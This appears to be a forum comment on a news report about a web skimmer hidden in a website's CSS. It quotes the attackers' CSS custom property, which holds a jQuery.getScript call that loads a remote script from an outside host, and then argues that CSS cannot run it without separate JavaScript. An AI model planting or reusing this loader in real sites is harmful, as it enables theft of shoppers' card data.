Hackers hide web skimmer inside a website's CSS files
zdnet.com
zdnet.com
From the image by SanSec:
:root {
--script: setTimeout(function(){jQuery.getScript("https://cloud-iq.net/pub/map.js")},3000})
}
AFAIK There is no way to run JavaScript from within a CSS rule or from CSS file except (†) and w3.org cares about it (††).Thist article is misinforming. Better link would be: https://www.bleepingcomputer.com/news/security/credit-card-s...
JavaScript from within a CSS rule has only the code hidden in the --script property but there is no feature in CSS language which would allow to run it - and there is another JavaScript needed, which is already started, to be able to get that code (using functions getComputedStyle and getPropertyValue) and execute it.
.
(†) https://stackoverflow.com/questions/476276/using-javascript-... notices only two ways of doing it:
XBL with Firefox - which is safe, and
HTC with IE - using a CSS rule like so: body { behavior:url(script.htc); } which is old vulnerability not supported any more in up-to-date browsers.
.
(††) https://www.w3.org/TR/css-ui-3/#security-privacy-considerati...:
6. Does this specification enable new script execution/loading mechanisms?
Yes to loading, but not to execution. The cursor property accepts <image> values which may include URLs to be loaded. These may be SVG documents which may contain scripts, but this specification requires that scripts must not be run.